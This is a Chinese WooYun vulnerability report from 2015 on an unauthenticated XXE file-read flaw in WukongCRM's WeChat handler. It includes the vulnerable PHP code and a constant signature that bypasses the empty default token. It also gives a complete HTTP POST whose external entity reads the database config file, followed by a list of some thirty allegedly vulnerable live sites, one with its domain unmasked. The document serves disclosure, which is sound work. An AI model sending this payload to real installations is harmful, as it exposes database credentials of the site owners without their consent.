当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2015-135088

漏洞标题: 悟空CRM一处任意文件读取(无需登录)

相关厂商: 郑州卡卡罗特软件科技有限公司

漏洞作者: 1c3z

提交时间: 2015-08-18 20:32

公开时间: 2015-11-21 20:35

漏洞类型: 任意文件遍历/下载

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 任意文件读取

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-23: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

xxe

详细说明:

测试版本:

http://**.**.**.**/Uploads/v0.5.1.zip



code 区域
//App\Lib\Action\WeixinAction.class.php
private function checkSignature() {
$signature = $_GET["signature"];
$timestamp = $_GET["timestamp"];
$nonce = $_GET["nonce"];
$echostr = $_GET["echostr"];

$token = $this->_token;

$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr);
$tmpStr = implode( $tmpArr );
$tmpStr = sha1( $tmpStr );

if( $tmpStr == $signature && $echostr != ""){
echo $echostr;
die();
}elseif( $tmpStr == $signature){
return true;
}else{
return false;
}
}

public function _initialize(){
$weixin = M('Config')->where('name = "weixin"')->getField('value');
$weixin_config = unserialize($weixin);
$this->_token = $weixin_config['WEIXIN_TOKEN'];
$this->bd_url = $weixin_config['WEIXIN_BD_URL'];
if(!$this->checkSignature()){
echo 'illegal origin';
exit;
}
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
$this->_post = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

}
//部分代码就补贴了



checkSignature函数做了一些验证,但是token默认为空,而且大多数用户都不会使用微信这个功能

可以计算出signature=da39a3ee5e6b4b0d3255bfef95601890afd80709通关验证



本地测试:

直接post:

code 区域
POST /wukongcrm/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.130 Chrome/43.0.2357.130 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 259

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE copyright [

<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=App/Conf/db.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<MsgType>event</MsgType>
<Event>subscribe</Event>
</xml>





选区_178.png



base64解密

选区_179.png





其他案例

选区_180.png



选区_181.png



选区_183.png













漏洞证明:

经测试下面的都可以xxe



http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://www.wxin.top/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

修复方案:

参考

http://**.**.**.**/web:xxe-attack

版权声明:转载请注明来源 1c3z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-21 20:35

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-08-19 09:43 | 染血の雪 ( 普通白帽子 | Rank:247 漏洞数:36 | 你挖 或者不挖 漏洞就在哪儿 不会增加 不...)
    0

    公司名字好牛逼~超级赛亚人你怕不怕

  2. 2015-08-21 07:30 | Elliott ( 实习白帽子 | Rank:48 漏洞数:11 | 绝逼不当程序员)
    0

    .NET洞好不好挖

  3. 2015-08-21 09:46 | 1c3z ( 普通白帽子 | Rank:297 漏洞数:63 | @)!^)
    0

    @Elliott 那是php写的 .NET洞确实不好挖

  4. 2015-08-21 11:04 | Elliott ( 实习白帽子 | Rank:48 漏洞数:11 | 绝逼不当程序员)
    0

    超级赛亚人你怕不怕

  5. 2015-11-21 22:04 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    0

    666

登录后才能发表评论,请先 登录